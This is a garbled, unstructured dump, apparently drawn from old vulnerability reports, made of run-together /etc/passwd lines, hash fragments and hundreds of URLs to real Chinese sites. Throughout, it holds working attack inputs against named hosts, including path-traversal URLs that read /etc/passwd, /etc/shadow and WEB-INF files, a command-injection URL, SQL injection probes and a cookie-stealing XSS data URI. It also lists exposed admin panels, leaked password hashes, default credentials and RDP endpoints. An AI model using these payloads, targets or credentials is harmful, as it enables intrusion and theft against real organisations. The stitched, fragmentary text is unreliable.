bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin 
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin nslcd:x:65:55:LDAP User:/:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin arpwatch:x:77:77::/var/lib/arpwatch:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin backupman:x:500:500::/home/backupman:/usr/local/bash_4.1/bin/bash mysql:x:30019:202::/home/mysql:/usr/local/bash_4.1/bin/bash www:x:80:80::/home/www:/sbin/nologin admin:x:30020:30020::/home/admin:/usr/local/bash_4.1/bin/bash http://km.oa.com/group/gslb/article_view/60750 jpLH1:16352:0:99999:7 http://183.60.76.243:8003/root/.bash_history http://183.60.76.243:8003/root/1.sql http://ehome.zte.com.cn//index.php?app=search&cate_id=505&page=1 http://ehome.zte.com.cn//index.php?app=s http://sqlmap.org http://www.mkzhan.com/ http://www.qb178.com/login.action http://xsc.bjut.edu.cn/Admin.php http://grandcloud.sdo.com/optool/index.php?r=ajax/QueryAreaList&serviceId=2 http://grandcloud.sdo.com/optool/index.php?r=ajax/QueryAreaList&serviceId=2 lRISpmqj4t1:16403:0:99999:7 www.tumen.gov.cn/news/news.asp?id=1193 www.tumen.gov.cn/news/news.asp?id=1193 http://sqlmap.org 
http://market.bitauto.com/chery/support/ http://market.bitauto.com/chery/support/eWebEditorExt/syslogin.aspx http://market.bitauto.com/chery/support/eWebEditorExt/jc_editor/dialog/img.htm http://wooyun.org/bugs/wooyun-2014-050728 http://www.siteview.com/cms/sites/public/case-content/it.html https://github.com/SiteView/ECC8.1.3/blob/7d7d8c7e7d7e7e03fa14f9f0e3ce5e04aacdb033/ECC8.1/Server/kennel/Alert/EmailAlert/emailTest.cpp http://fly.lfmz.gov.cn/ http://www.zjgxzsp.gov.cn/zjg_sp_front/showinfo/search.aspx?type=2&txt= http://www.zjgxzsp.gov.cn/zjg_sp_front/showinfo/search.aspx?type=2&txt= http://www.zjgxzsp.gov.cn/zjg_sp_front/ShowInfo/sxlist.aspx?TASKCLASS_FORZHUTHEME=%E5%AE%89%E5%85%A8%E9%98%B2%E6%8A%A4&type=1 http://www.zjgxzsp.gov.cn/zjg_sp_front/ShowInfo/sxlist.aspx?ougu http://www.zjgxzsp.gov.cn/zjg_sp_front/ShowInfo/sxlist.aspx?ougu http://www.zjgxzsp.gov.cn/zjg_sp_front/ShowInfo/sxlist.aspx?APPLYERCLASS=&type= http://www.zjgql.gov.cn/gk.asp?ID=1 http://reg.cntv.cn/forgetPassword/findPassword.jsp http://reg.cntv.cn/forgetPassword/forgetPasswordReset.action?usridSecret=a61df9b7ca12886d65d2d9341e05868091933bfb578da1e5e5a6e6ee74f0e074ef64c1baa72e4a3a&compareFlag=6b031e783ad8750155ec817300e0b59a&code=67A83019E298968167E9454FB8A3DDBA8863EE8C http://game.g.pptv.com/guest/c/yxsd/api.php?action=login,这也是一个登陆框,整站并没有其他东西 http://supplier.sinopec.com:9001/logonAction.do http://www.xcfdc.gov.cn/weblinkmx.asp?cityID=1&classID=1 http://www.xcfdc.gov.cn/news.asp?bd=72 http://www.xcfdc.gov.cn/weblinkmx.asp?cityID=1 http://xxcg.ciwong.com/learninglevel/SubjectDetail?id=89 http://e.ciwong.com/home/go?schoolId=224161 http://gxkt.ciwong.com/captcha/index?aid=20130110 http://www.shannet.net/ www.sdtsx.com/shownews.asp?id=190 www.bxqianfeng.com/shownews.asp?id=185 www.sdtsx.com/shownews.asp?id=179 www.sdbzht.cn/shownews.asp?id=133 www.sdjrsm.com/shownews.asp?id=204 www.sdpuli.com/shownews.asp?id=193 www.sddequan.com/Shownews.asp?id=168 www.sdmwmy.cn/shownews.asp?id=194 
www.sdlzmm.cn/shownews.asp?id=195 www.zpyixin.com/shownews.asp?id=194 www.yxsffz.com/shownews.asp?id=191 www.sdzd.cc/shownews.asp?id=198 www.yxjsmy.com/shownews.asp?id=193 www.zpjianqiao.com/shownews.asp?id=170 www.zpjianqiao.com/shownews.asp?id=171 www.sdlyyz.cn/shownews.asp?id=196 www.zpsymm.com/shownews.asp?id=198 www.stsswkj.com/shownews.asp?id=167 www.sdltml.com/shownews.asp?id=118 www.wdjqwj.com/shownews.asp?id=193 www.jthg88.com/shownews.asp?id=205 www.hrjmx.com/shownews.asp?id=177 www.sdtsx.com/admin/login.asp www.sdtsx.com/admin/login.asp www.sdjrsm.com/admin/login.asp www.sdpuli.com/admin/login.asp www.sddequan.com/admin/login.asp www.zpyixin.com/admin/login.asp www.yxsffz.com/admin/login.asp www.zpjianqiao.com/admin/login.asp www.sdlyyz.cn/admin/login.asp www.zpsymm.com/admin/login.asp www.stsswkj.com/admin/login.asp www.sdltml.com/admin/login.asp www.wdjqwj.com/admin/login.asp www.jthg88.com/admin/login.asp www.hrjmx.com/admin/login.asp www.bxqianfeng.com/admin/login.asp www.sdbzht.cn/admin/login.asp www.sdmwmy.cn/admin/login.asp www.sdlzmm.cn/admin/login.asp www.sdzd.cc/admin/login.asp www.yxjsmy.com/admin/login.asp http://120.197.95.230:8080/ http://120.197.95.230:8080/resin-doc/examples/security-basic/viewfile?file=WEB-INF/web.xml pince:Txpd1jQc/xwhISIqodEjfw==:staff,website filch:KmZIq2RKXAHV4BaoNHfupQ==:staff http://120.197.95.230:8080/resin-doc/examples/security-basic/viewfile?file=WEB-INF/password.xml http://c.weipai.cn/ http://wei.gaofen.com/index.php?g=Wap&m=Vote&a=index&token=ygswip1402448998&wecha_id=1421416731980&id=1 http://c.weipai.cn/ http://c.weipai.cn/etc/htpasswd.users http://act.imir.sdo.com/project/pjs_jt/index.asp?actname=&page=3 http://chuanqi.sdo.com/project/cosplay/videolist.asp?categoryid=2003 https://github.com/LeoOnHack/Log-Smart/blob/aa296f726c224d4242bba1f5722aaec64d6cb5be/exp/exp-email-08.py http://www.yangche51.com/customer/retrievepasswordstep.aspx?action=phone&token=爆破得到 phyedu.dlut.edu.cn/phy/teachershow.php?id=1 
http://www.ciwong.net/www.ciwong.net.rar www.tuhu.cn http://61.152.103.29/ http://9.qq.com/QQ九仙 http://www.cae.com.cn/webfunction/deliveryrange/cityrange.aspx?cid=0007 http://play.easou.com/d.e?gameId=1253&esid=ak0V-8TD4ig9LoqxDC&wver=c&qn=33&fr=1&l=1&version=c https://github.com/isme-jac/wl_product/blob/7119ea9d751e0fcba09c13adf08c822ba2c8a5c6/core/mail.php LoginRegisterAjax.aspx/FindMobliePwd www.muyingzhijia.com http://www.muyingzhijia.com http://agents.easou.com/agents/ums/logon.jsp http://agents.easou.com/resin-doc/examples/security-basic/viewfile?file=WEB-INF/web.xml http://caucho.com/ns/resin"> test:type=Basic example:name=basic http://agents.easou.com/resin-doc/examples/security-basic/viewfile?file=WEB-INF/password.xml ip:124.202.137.124 http://ndc.zjgsu.edu.cn/index.action https://github.com/haipenge/faceye-feature/blob/fe7e8815909aafcd74b569bf1d7de592980a2589/src/main/resources/mail.properties http://121.10.241.110:50060/ http://121.10.241.110:50060/logs/ http://121.10.241.110:50060/logs/hadoop-hadoop-jobtracker-other-tel-zhaoqin-110.aipai.com.log.2015-01-16 IP:124.202.137.138 http://www.ehaier.com/subject/ppjxr.html www.ehaier.com http://www.sinoagent.com/vc/vc/columncount/downfile.jsp?savename=a.txt&filename=../../../../../../../../etc/passwd http://www.njhdgcj.com/vc/vc/html/upload/j.jsp http://*.e.ciwong.com/course/Home/,提交课本名称处,CourseName字段可进行POST注入。 http://bmxx.e.ciwong.com/ http://ftwy.e.ciwong.com/ http://hfsjwy.e.ciwong.com/ http://hlsz.e.ciwong.com/ http://hqczx.e.ciwong.com/ http://bmxx.e.ciwong.com/course/Home/,抓包, http://218.94.6.164/Account/Login.aspx http://www.lycgs.gov.cn:9080/wscgs/liuyan.do?type=lynr&id=32082&lb=0 http://www.zjgfpc.gov.cn/SDFF/2_ysz/View_Picture.asp?ID=49 http://www.zjgfpc.gov.cn/old/qczx1.asp?aid=4965 http://sso.easou.com/ http://sso.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-INF/web.xml http://caucho.com/ns/resin xmlns:resin="http://caucho.com/ns/resin/core 
resin:type="com.caucho.portal.generic.GenericPortal resin:type="com.caucho.portal.generic.BufferFactoryImpl resin:type="com.caucho.portal.alpharenderer.HtmlRenderer resin:type="com.caucho.portal.alpharenderer.HtmlRenderer"/ resin:type="com.caucho.doc.config.TreePortlet https://116.236.247.174/vote/views/login.html?r=0.6828486339654773 https://116.236.247.174/servlet/Image http://www.80vul.com/yzm/v.php?url=http://static.wooyun.org/wooyun/upload/201501/17151946732f854ecd3668a574a72e076d7c0a7d.jpeg http://www.80vul.com/yzm/v.php?url=https://e.ebscn.com/servlet/Image https://e.ebscn.com http://sdk2.entinfo.cn/z_mdsmssend.aspx http://www.yaofang.cn/a/user/Show_Pass www.zygl.cn http://www.weipai.cn/ http://kyc.zjgsu.edu.cn/kyc_new/notify.do?ActionMethod=view&id=1543 http://1004.ent.weipai.cn/etc/htpasswd.users http://ent.weipai.cn/ http://ent.weipai.cn/data/Gateway/ http://phylab.ysu.edu.cn/news/front/shownews.asp?id=130 http://android.wochacha.com/shopsale/storedetail?city_id=15&v=8.0.0&stid=28959&connectnet=wifi&distime=1232553600&protime=1232553600&newudid=3368d926dcb2f8ceee1211c7c5d34587&lng=11*.****96&mac=******&from=super&udid=359050050095308&lat=2*.****89 http://android.wochacha.com/shopsale/allbrandlist?city_id=15&v=8.0.0&connectnet=wifi&newudid=3368d926dcb2f8ceee1211c7c5d34587&lng=****&mac=B8%3A5E%3A7B%3A55%3AA6%3AC9&udid=359050050095308&lat=****&usuastid=[{"stid":"28959","time":"1232553600 www.meilele.com http://www.meilele.com http://wz.easou.com http://wz.easou.com:80/coln.e?esid=X8TDH5mErCJ&tk=com_teamwork2 http://www.rsc.sdu.edu.cn/2010new2/display.php?id=888 http://www.cpbao.com/user/fund!bindMobileOrEmail.action?userIdCard=用户ID&isBindEmail=1&bindEmail=邮箱; http://shu.easou.com/ http://shu.easou.com/resin-doc/examples/security-basic/viewfile?file=WEB-INF/web.xml pince:Txpd1jQc/xwhISIqodEjfw==:staff,website filch:KmZIq2RKXAHV4BaoNHfupQ==:staff http://shu.easou.com/resin-doc/examples/security-basic/viewfile?file=WEB-INF/password.xml 
http://yun.lenovo.com/lxymanage/login.php http://yun.lenovo.com/lxymanage/member1.php http://yun.lenovo.com/ http://www.codoon.com/login http://www.codoon.com/home http://www.lycgs.gov.cn:9080/wscgs/yymap.do?type=load&dwlb=01 http://feedback.uc.cn/feedback/feedback/delete_feedback_data?uc_param_str=einibicppfmivesifrutlantcunwsssv http://9air.com/ http://121.12.117.111:9231/v2014/ http://222.74.163.22:8080/system/login!input.action http://www.nxzwzx.com/ http://gongshe.cig.com.cn/登录id需要四位数字,生成0001—9999 www.qikanw.com http://t2.easou.com http://t2.easou.com/zone/mobile/mobilekey/key/0/breed_id/1 http://jxhd.ciwong.com/ http://bbs.ciwong.com/login.aspx http://super.admin.ciwong.com/Admin/Login http://mail.ciwong.com/index.php http://gwy2013.ciwong.com/lead/Login http://anquan.ciwong.com/Account/Login/ http://e.ciwong.com/login/indexbefore http://e.ciwong.com/login/ http://admin.eschool.ciwong.com/users/login http://admin.ciwong.net/Permission/Login/Login http://demo.ciwong.com/ http://game.ciwong.com/game/Play/1315 http://bbs.ciwong.com/ReadMe.txt http://www.6v68.com/Areas/ http://www.6v68.com/admin/ http://113.106.50.4:81/admin/ rdp://121.14.117.223:6543 rdp://121.14.117.26:6543 rdp://113.106.50.9:6543 http://218.58.70.209:8080/ http://218.58.70.209:8080/providerUnlock.jsp http://mooc.chaoxing.com/ http://www.chinare.org.cn/standardList/?publishYear=2013 http://www.geodata.cn/Portal/imagebase/rsResult.jsp?rstype=6*&year=&month=00&col=&row=&isCookieChecked=true http://www.geodata.cn/Portal/SamplePreview?id=chinare-4424 http://www.geodata.cn/Portal/intelNavigation/extSiteShow.jsp?search=&isCookieChecked=true http://www.geodata.cn/Portal/newsbrowse/news_list.jsp?newssort_ID=115&isCookieChecked=true http://114.251.39.178/jsp/.svn/entries https://open.cebbank.com/portal/EReceivePayAuth.do https://open.cebbank.com/portal/SunnyEReceive.do?BankId=9998&WT.ac_id=800000102 http://bbs.paojiao.com/.svn/entries 
http://www.szzwfw.gov.cn/xzsp/servlet/openFile?filename=ff8080813abfc49d013b639dd77b015f.doc&filepath=biaogefiles&showname=%C8%EB%BA%D3%C5%C5%CE%DB%BF%DA%C9%E8%D6%C3%C9%EA%C7%EB%CA%E9.doc http://www.szzwfw.gov.cn/xzsp/servlet/openFile?filename=shadow&filepath=../../../../../../etc http://www.szzwfw.gov.cn/xzsp/servlet/openFile?filename=jsp/web_sxcz/index_list_jc.jsp&filepath=/ http://www.szzwfw.gov.cn/xzsp/servlet/openFile?filename=WEB-INF/web.xml&filepath=/ peRr3NUyeNiW3c2GvxYDo1:16307:0:99999:7 http://www.agridata.cn/data/dataList.aspx?firstSubject_par=1 http://www.ceas.org.cn/photo/article_show.asp?channelid=3&articleid=8391 http://www.ceas.org.cn/flfg/soft_show.asp?channelid=1003&softid=2799 http://oa.socool-tech.com/Login_bin/login_1.html http://zhns.socool-tech.com/Login_bin/login_1.html# http://aged.socool-tech.com/Login_bin/main_4.html# http://zhsqgz.socool-tech.com/Login_bin/login_1.html# http://zhsqfw.socool-tech.com:92/# http://oa.socool-tech.com:82/ http://zhns.socool-tech.com:82/ http://aged.socool-tech.com:82/ http://zhsqgz.socool-tech.com:82/ http://zhsqfw.socool-tech.com:82/ http://union.suning.com/aas/wap/ad/single-promotion!search.action?search=y ctx:/aas https://kyfw.12306.cn/otn/login/init https://kyfw.12306.cn http://www.16wifi.com/ inurl:honor/rydt/jianjie?uid= http://www.vsread.com/index.php/honor/rydt/jianjie?uid=20972&t=1 http://218.87.140.106/ http://oa.jxgxedu.gov.cn/ http://59.55.33.137:8010/ http://59.55.33.137:8040/ https://www.bigsun.com.cn/zxjt/lccs/dxjjinfo.jsp?jjid=020001 http://221.204.31.9/ www.kdgj.cn/login.jsp http://221.130.61.78:8090/ inurl:CH/news.asp?BigClassID= http://www.cnyfcj.com/CH/news.asp?BigClassID=2 http://www.sqlmap.org www.cnyfcj.com\session http://www.cnyfcj.com:80/CH/index.asp http://orc.sjtu.edu.cn/lunwen.php?id=1 http://phyedu.dlut.edu.cn/show.php?id=325 http://jzx.jluzh.com/kygood/downfile.asp?filename=../conn.asp http://www.czwhcb.gov.cn/manager/login.aspx 
http://www.camh.org.cn/admin/MakeTopictoHTML.php?channelID=4 http://www.yanshilong.com/admin/MakeTopictoHTML.php?channelID=23 http://www.chnria.com/admin/MakeTopictoHTML.php?channelID=16 http://159.226.113.130/admin/MakeTopictoHTML.php?channelID=3 http://www1.psych.ac.cn/admin/MakeTopictoHTML.php?channelID=3 http://www.caim.org.cn/admin/MakeTopictoHTML.php?channelID=10 http://home.focus.cn/product/goodsdetail_2354_30509/ http://home.focus.cn/product/goodsdetail_2354_30509'/ http://home.focus.cn/product/goodsdetail_2354_30509''/ http://sese.sjtu.edu.cn/TeacherTeam/DetailTeacherInfo.php?num=2&cnum=1&ID=1 http://www.haoran.sjtu.edu.cn/customer/custdetail.asp?id=267 http://www.haoran.sjtu.edu.cn/admin/access/ http://wap.kuwo.cn/wap/wap/Model?id=72 https://mobile.cmbchina.com/MobileHtml/Login/LoginC.aspx http://v2.expo2013.city.sina.com.cn/s/pnlink.php?id=12473&typeid=69 http://v2.expo2013.city.sina.com.cn/s/pnlink.php?id=12473&typeid=69 http://v2.expo2013.city.sina.com.cn/s/pnlink.php?id=12473&typeid=69/1 http://v2.expo2013.city.sina.com.cn/s/pnlink.php?id=12473&typeid=69-1 https://sns.amap.com IP:sns.amap.com http://218.106.129.7/ http://tvs.tcl.com/bigfile/ jdbc:oracle:thin:@10.3.3.149:1521:phone http://218.106.129.23:8080/ http://218.106.129.60/yanshijilu.php?s_province=%E8%AF%B7%E9%80%89%E6%8B%A9%E5%88%86%E5%85%AC%E5%8F%B8&s_city=%E8%AF%B7%E9%80%89%E6%8B%A9%E5%88%86%E9%83%A8&s_county=11 http://218.106.129.60/show.php?s_city=Chicago&s_county=MIDDX&s_province=1 http://mail.chinahaisheng.com http://w3.geekpark.net/display?cat=1 http://218.106.129.13/DRP/ http://www.tcl.com/data/haoy.php http://gpk.im http://gpk.im/admin/index.php http://www.changan.com.cn:80/ www.changan.com.cn http://shenpi.yonyou.com/ http://shu.easou.com/) http://shu.easou.com/reader.e?tagid=38&rpt=list&esid=7uTD95pbqN1&qd=M3150001&fr=3.r1_c.93 http://119.145.193.214/QueryWebs/Account/Login.aspx?ReturnUrl=~/News.aspx 
http://119.145.193.214/QueryWebs/Account/Login.aspx?ReturnUrl=%2fQueryWebs%2fAccount%2f http://sjhj075489802999.eicp.net:81/QueryWebs/Account/Login.aspx?ReturnUrl=~%2fQuery.aspx http://sjhj075489802999.eicp.net:81 http://xlfhssygjr.eicp.net:81/QueryWebs/Account/Login.aspx http://hqsz.ouc.edu.cn http://it.ouc.edu.cn/visionlab/login.aspx http://222.51.224.76/QueryWebs/Account/Login.aspx http://222.51.224.76/QueryWebs/Account/Login.aspx http://xiaoyuan.lefeng.com/page/.svn/entries http://xiaoyuan.lefeng.com/page/common/.svn/entries http://61.133.99.76/ http://www.haust.edu.cn/document/default.aspx?siteid=50&columnid=%b1%ed%b8%f1%cf%c2%d4%d8 http://www.haust.edu.cn/document/default.aspx?siteid=50&columnid=%ce%c4%bc%fe%bb%e3%b1%e0 http://www.haust.edu.cn/document/default.aspx?siteid=50&columnid=%d7%ca%c1%cf%cf%c2%d4%d8 http://data.pension.hexun.com/ http://www.faisco.cn/password.jsp http://old.geekpark.net/ajax/like_entity http://www.ahnw.gov.cn/nwsms/ http://bdyh.baidu.com/login.action http://www.cits.cn/member/faq.html http://218.106.130.40:8080/ https://github.com/zacharyhu/Hello-World/blob/7af3217607fe88c86fb8792a8bf42607b39f60bf/html_test/sendmsg2.php http://content.businessvalue.com.cn/special/32819* http://www.shandongair.com.cn/query/login.jsp http://t.178.com/widget/tweet/resource?token=kAdAB5&token32=a422b048a5c2560d8896f001573380c3&order=default&comment_order=desc http://old.geekpark.net/ajax/share_plus http://220.181.163.184/ http://220.181.163.184/phpmyadmin/ http://www.53kf.com/?controller=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00login http://ehr.tcl.com/gls/ http://60.29.238.177/report http://60.29.238.179/report http://tg.hexun.com/ajaxresponse/response2.aspx?func=bindteacherlist&userids=%2716799401%27,%2725144711%27,%2725144761%27,%2725147204%27,%2725178838%27,%2725178866%27,%2725179068%27,%2725184126%27,%2725185826%27&_=1421384235342 http://www.pengpengmall.com/mall/goods/help/index.html?id=3462617 
http://www.tcldisplay.com/service.asp http://www.tcldisplay.com/list.asp?ID=38 http://hubei.tsyw.bankcomm.com:8080/UserFiles/Image/test/guige.jsp http://hubei.tsyw.bankcomm.com:8080/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://www.tuniu.com/trips/10003511 data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+ http://xxpt.zjmc.net.cn/xxpt/Index.action http://www.55bbs.com/ http://groupoa.tcl.com/tcl/Infor/InforManage.nsf?opendatabase http://ku.178.com/top/hot?c=8&t=month http://www.12333sh.gov.cn/200912333/2009wsbs/grbs/shbx/01/200909/t20090917_1085043.shtml http://www.12333sh.gov.cn/grxx/grxx.jsp http://www.yuantiku.com/campus/.git/config http://qqvip.caissa.com.cn:28017/ http://www.hainanpost.cn/news_list.asp?cataid=6291456 http://www.hainanpost.cn/news_detail.asp?id=15323 http://www.wcb.yn.gov.cn:8080/login/fRegister.aspx http://www.wcb.yn.gov.cn:8080/index/index.aspx http://www.wcb.yn.gov.cn:8080/sys_BiddingRecord/fFrame.aspx http://www.minjiao.com/ http://gw.zzlwjy.com/SysModule/Account/AccountAdd.aspx http://gw.jojy.net/SysModule/Account/AccountAdd.aspx http://gw.ptedu.gov.cn/SysModule/Account/AccountAdd.aspx http://gw.qledu.gov.cn/SysModule/Account/AccountAdd.aspx http://gw.gledu.gov.cn/SysModule/Account/AccountAdd.aspx http://gw.mwedu.gov.cn/SysModule/Account/AccountAdd.aspx http://gw.fjhajy.gov.cn/SysModule/Account/AccountAdd.aspx http://gw.fjjyjy.net/SysModule/Account/AccountAdd.aspx http://gw.fqedu.gov.cn/SysModule/Account/AccountAdd.aspx http://gw.mwedu.gov.cn/SysModule/Account/AccountAdd.aspx http://gw.jojy.net/SysModule/Account/AccountAdd.aspx http://ns.dlfilm.com//cmts_sales/cinemaplan!CinemaPlan.action http://ns.dlfilm.com//cmts_sales/cinemaplan!CinemaPlan.action http://www.dlfilm.com/ http://60.29.19.128/zbb/ http://60.29.19.128/zbb/tjsinfo/zbb/system/login.action http://data.kuwo.cn/config.cf?type=103文件中都能找到如下ip http://www.enghengyang.gov.cn/showdetail.aspx?newsid=12187 
http://www.wandafilm.com/baseInfo/film/filmIndex.do?m=film_info_init_next&filmId=20141229111046116265 HTTP://xss.hacktask.net/njgZKz?1421640813 http://www.wandafilm.com/user/message_mgr.do?m=init http://www3.ouc.edu.cn/yjsjy/oucxwxx/xwb.htm http://sports.ifeng.com/nba/team/match/14?sch_date=2014-0 www.qysjtj.gov.cn/class.php?code=07 http://uctest.ucweb.com:8088/Page/XHTML/Tag/15.4.5/15.4.5.19.xhtml http://shop.818hr.cn/phpmyadmin/ http://www.zzb.buct.edu.cn/admin/Admin_Login.asp http://www.comingchina.com/html/downloads/ http://www.comingchina.com/html/case/ http://mail.fuck.com/webmail/为普通用户的登录入口 http://mail.fuck.com/webmail/admin/?module=user&action=login为域/超域/系统管理员的登录入口 http://sales.xcar.com.cn/admin/login.php http://xxx/xxx.html https://twitter.com/avlidienbrunn/status/486059626002395136,但实际上这个方法的危害不止于此,大部分基于黑名单的富文本过滤器是没有考虑这个方式的XSS的,通过这个就能简单构造一个XSS。 http://mhz.pw/game/SOP/01.php www.dapu.com/product-update_ask-690.html http://xxx/xxx.html https://twitter.com/avlidienbrunn/status/486059626002395136,但实际上这个方法的危害不止于此,大部分基于黑名单的富文本过滤器是没有考虑这个方式的XSS的,通过这个就能简单构造一个XSS。 http://mhz.pw/game/SOP/01.php http://www.baidu.com/cb.php?c=IgF_pyfqnHRzrj6kn1R0IZ0qnfK9ujYkPjbsrj610Aw-5HDdnWbznHR0TAq15HbdnHcYn6K15H04uhRkPhRsmH03PjDvPvc0uZfqnHfznHmdnHmvrfKdThsqpZwYTjCEQLILIz4JpgNJpgNCIgI9pi4WUvYEP1nvP1b1Qh9YUys0ThfqnW60mhYqn0KsTWYs0ZNGujY1Pjnknj0k0AqGujY3njfsP6KWpyfqnHDzrjRL0AqLUWYLrjD4nfKWThnqn1nsPjD http://www.jiujiuhuwai.com/736793.html http://218.5.1.22:8001/tsp/ http://clbd.ciwong.com/CloudReader/Home/AjaxGetSchool http://58.56.25.53/xxpt/jpzy/index.asp http://58.56.25.53/xxpt/jpzy/indexkw.asp http://58.56.25.53/xxpt/hkqwx/index.asp http://58.56.25.53/index.htm http://58.56.25.53/admin http://www.nclggq.com/szwyadmin/login.asp http://baike.baidu.com/link?url=Bookhr3XPpnGzIRBdjUwDfkSht1fLhZLqrz6PQ_Y3afjPNGuKCKU4Fvr7vy4ToC792WyvCiqxDiuV1SmHIWGsa http://first-trial.huawei.com/ http://ilas.lib.hustwb.edu.cn/NTRdrLogin.aspx 
http://haohaizi.ciwong.com/search/GetVideo?_=0.7888064351864159&cate=2&order=2&page=1&txt=e http://www.6v68.com/EShop/ShopCenter/GetProductsBy?shopId=&type=0&typeTwo=0&periodId=0&subjectId=0&pageIndex=0&pageSize=20&minValues=0&maxValues=0&_=1421661246302 http://www.6v68.com/EShop/ShopCenter/GetProductsBy?shopId=&type=0&typeTwo=0&periodId=0&subjectId=0&pageIndex=0&pageSize=20&minValues=0&maxValues=0&_=1421661246302 http://musicmini.baidu.com/app/passport/getBDUSS.php http://disk.yun.uc.cn/ajax/pcmkdir?dirid=1&dirname=wooyun&_=1421665148737 http://disk.yun.uc.cn/ajax/pcmkdir?dirid=1&dirname=testuc&_=1421665148737 http://dept.wyu.edu.cn/xinxi/shownews.asp?nsid=837 http://219.142.122.7:8080/Manager/Login.aspx www.xinyi.gov.cn http://119.145.193.214/QueryWebs/Account/Login.aspx?ReturnUrl=~/News.aspx http://xlfhssygjr.eicp.net:81/QueryWebs/Account/Login.aspx http://222.51.224.76/QueryWebs/Account/Login.aspx http://sjhj075489802999.eicp.net:81/QueryWebs/Account/Login.aspx?ReturnUrl=~%2fQuery.aspx http://119.145.193.214/QueryWebs/Account/Login.aspx?ReturnUrl=~/News.aspx http://119.145.193.214/QueryWebs/Account/Login.aspx?ReturnUrl=%2fQueryWebs%2fAccount%2f http://bj.cgws.com/ http://soft.zdnet.com.cn/files/poll_show.php?actionid=84 http://www.seecom.com.cn/StationSearch.aspx?key=1 http://www.seecom.com.cn/StationSearch.aspx?key=1% http://user.g.pptv.com/login/cms/?gid=dgwm,可以看到这个登陆地址也是只有一个单纯的登陆框,但是这次和前两单纯的绕过抓包限制不同了,这次的有个验证码,尼玛难度一下提升了有木有! 
http://cloud.buu.edu.cn:34899/templet_pro.do http://183.62.232.32:8080/ http://www.olvip.cn:8080/ http://218.56.48.139:8083/front/register/register.html http://218.56.48.139:8003/check_id.asp?username=system http://218.56.48.139:8003/check_id.asp?username=system http://email.ctgpc.com.cn/ http://www5.53kf.com/iframe_brief.php?style_id=106000198&language=cn http://wooyun.org/bugs/wooyun-2010-079668 http://wooyun.org/bugs/wooyun-2010-081423 www.huat.edu.cn http://wms.fruitday.com/ http://cztsg.sxfwu.com/FCKeditor/_whatsnew.html http://cztsg.sxfwu.com/FCKeditor/editor/filemanager/connectors/test.html http://cztsg.sxfwu.com/FCKeditor/editor/filemanager/connectors/uploadtest.html http://cztsg.sxfwu.com/Admin/Login.aspx http://cztsg.sxfwu.com/Admin/FAQ/asphxg.asp http://manager.ourhost.com.cn/ web:dancewithbanban web:888888 web:888888 root:888888 oracle:888888 sybase:888888 oracle:888888 test:888888 test:888888 oracle:888888 sybase:888888 oracle:888888 test:888888 test:888888 http://125.93.53.79:9080/TaskService/webChatAndLeaveWord.action?entranceid=www.mypengpeng.com&status=0&agentId=&tenantID=981&groupid=46404&clientURL=&clientIP= http://tj.fruitday.com/ http://xyb.xisu.edu.cn/userReg.asp www.998.com http://www.998.com http://www.998.com/Account/Sign http://bbs.laifeng.com/uc_server http://www.tuniu.com/ http://home.focus.cn/group/others/tag/group_tag_list.php http://58.211.243.125:8080 http://sdgs.shenhuagroup.com.cn/manage/fckeditor/editor/filemanager/connectors/test.html# http://www.thenorthface.com.cn/user/712270 http://www.hljjjjc.gov.cn/news.php?cid=132 http://www.hljjjjc.gov.cn/shownews.php?id=24398&cid=34 http://www.hljjjjc.gov.cn/?cid=2&pid=132&page=1 http://talk.zj.com/search.cgi?zhuanzai=0&fankui_tag=0 http://www.cbw365.com/index.php/Admin/Index http://bsfw.hebds.gov.cn/wbcms/ http://219.148.59.40:81/wbcms/ http://219.148.59.40:81/wbcms/js/fckeditor/editor/dialog/fck_image.html http://comment.xcar.com.cn http://www.oa8000.com/solution.htm 
http://demo.oa8000.com http://219.142.40.233:443/Conf/jsp/user/loginAction.do http://www.mogoroom.com/room/roomList.shtml site:bigsun.com.cn filetype:bak https://www.bigsun.com.cn/zxjt/zqzl/qzzl/lcjsp/SQLInclude_Info.jsp https://www.bigsun.com.cn/zxjt/cjzx/detail/public/many_list.jsp?parendId=0002000400060001 https://www.bigsun.com.cn/zxjt/cjzx/detail/public/many_list.jsp?parendId=0002000400060001%27 https://www.bigsun.com.cn/zxjt/cjzx/detail/public/many_list.jsp?parendId=0002000400060001%27 http://119.147.193.173/php/task.php http://119.147.193.173/php/task.php?url=http://localhost;ps%20aux;&cmd=id&time_index=1&email= www.piaowuwang.cn/venue-intro.aspx?id=26 http://www.pxto.com.cn/User/reg_info.asp http://demo.yxcms.net http://sms.xcar.com.cn/phpmyadmin/ http://sms.xcar.com.cn/upload/upload.php http://www.wooyun.org/corps/phpcms http://thinkbbs.lenovo.com.cn/.svn/entries http://shangou.lenovo.com.cn/yypic/ns-v1000-h1.jpg/.php http://qidian.gongfubb.com/ 